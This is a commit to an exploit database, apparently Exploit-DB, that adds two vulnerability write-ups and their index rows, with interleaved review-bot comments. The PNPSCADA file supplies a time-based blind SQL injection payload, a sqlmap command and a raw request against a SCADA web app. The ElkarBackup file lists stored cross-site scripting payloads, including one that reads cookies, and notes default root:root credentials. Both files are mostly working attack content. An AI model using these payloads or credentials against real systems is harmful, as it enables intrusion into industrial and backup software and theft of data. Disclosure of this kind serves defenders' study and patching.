DB: 2020-08-21
2 changes to exploits/shellcodes

ElkarBackup 1.3.3 - Persistent Cross-Site Scripting
PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
parent
135de074fb
commit
caf6833937
3 changed files with 99 additions and 0 deletions
57
exploits/hardware/webapps/48757.txt
Normal file
@ -0,0 +1,57 @@
# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
# Google Dork: -
# Date: 2020-08-17
# Exploit Author: İsmail ERKEK
# Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp
# Version: 2.200816204020
# Tested on: -
1. Description:
----------------------
PNPSCADA 2.200816204020 allows SQL Injection via parameter 'interf' in
/browse.jsp. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from one of the affected pages with
'interf' parameter and save it like fuel.req Then run SQLmap to extract the
data from the database:
sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent
3. Example payload:
----------------------
(time-based blind)
memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND
6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831
4. Burpsuite request:
----------------------
POST /browse.jsp HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer:
http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37
memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831
Best Regards.
Ek alanı
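Review bot: the proof-of-concept section is internally inconsistent: the text tells the reader to save the intercepted request as `fuel.req`, but the sqlmap command that follows reads `-r req-pnp-browse.txt`; pick one filename. The quoted Burp request is also line-wrapped (the `User-Agent:` value continues on the `Trident/5.0)` line and the `Referer:` URL sits on a line of its own), so it no longer parses as a single HTTP request, and the `JSESSIONID` / `psl` cookie values look like live session data; restore the header lines and replace the session values with placeholders. `# Google Dork: -` and `# Tested on: -` are empty fields, and the closing `Best Regards.` / `Ek alanı` lines are mail-client residue that does not belong in the advisory. Since the payload relies on `PG_SLEEP`, the description should say the backend is PostgreSQL, and a remediation line (bind `interf` as a query parameter instead of concatenating it into the SQL string in /browse.jsp) would help maintainers triaging this entry.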
40
exploits/php/webapps/48756.txt
Normal file
@ -0,0 +1,40 @@
# Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting
# Date: 2020-08-14
# Exploit Author: Enes Özeser
# Vendor Homepage: https://www.elkarbackup.org/
# Version: 1.3.3
# Tested on: Linux
1- Go to following url. >> http://(HOST)/elkarbackup/login
2- Default username and password is root:root. We must know login credentials.
3- Go to "Jobs" and press "Add client" button.
4- Write XSS payload in "Name" section.
5- Press "Save" button.
(( Executable XSS Payloads ))
1- "><script>alert('XSS Confirmed!');</script>
2- "><script>alert("XSS Confirmed!");</script>
3- "><script>alert(document.cookie);</script>
4- "><script>alert(document.domain);</script>
(( REQUEST ))
POST /elkarbackup/client/2 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/elkarbackup/client/2
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
Connection: close
Cookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2
Upgrade-Insecure-Requests: 1
Client%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E&
Client%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1&
Client%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=&
Client%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI
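Review bot: the reproduction steps and the captured request disagree: step 3 says to press `Add client`, but the request is `POST /elkarbackup/client/2` with `Referer: http://(HOST)/elkarbackup/client/2`, which is the edit form of an existing client (id 2); state whether the stored payload is saved through create, edit, or both. The request body is split over four lines with `&` at the line ends while `Content-Length: 358` refers to the unwrapped form, so it should be restored to a single line, and `Client%5B_token%5D=...` and `PHPSESSID=...` are per-session values that should be placeholders in the same way `(HOST)` already is. Step 2 reads better as `The default credentials are root:root; valid login credentials are required.` A remediation line noting that the `Client[name]` value is rendered without HTML encoding, and that the fix is contextual output escaping in the template, would give maintainers what they need to act on this entry.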
@ -42996,3 +42996,5 @@ id,file,description,date,author,type,platform,port
48752,exploits/php/webapps/48752.txt,"Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection",2020-08-18,"Moaaz Taha",webapps,php,
48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,
48755,exploits/hardware/webapps/48755.txt,"Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal",2020-08-19,Tuygun,webapps,hardware,
48756,exploits/php/webapps/48756.txt,"ElkarBackup 1.3.3 - Persistent Cross-Site Scripting",2020-08-20,"Enes Özeser",webapps,php,
48757,exploits/hardware/webapps/48757.txt,"PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)",2020-08-20,"İsmail ERKEK",webapps,hardware,
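Review bot: the `date` column of both new rows is 2020-08-20, but the `# Date:` headers of the added files say 2020-08-17 (48757) and 2020-08-14 (48756); if the CSV field is the publication date rather than the author's date, say so in the commit message so the two are not read as a typo. Id 48754 is also absent from the sequence between the context rows 48753 and 48755; confirm that is intentional. The trailing empty `port` field on both rows matches the surrounding entries, which is fine.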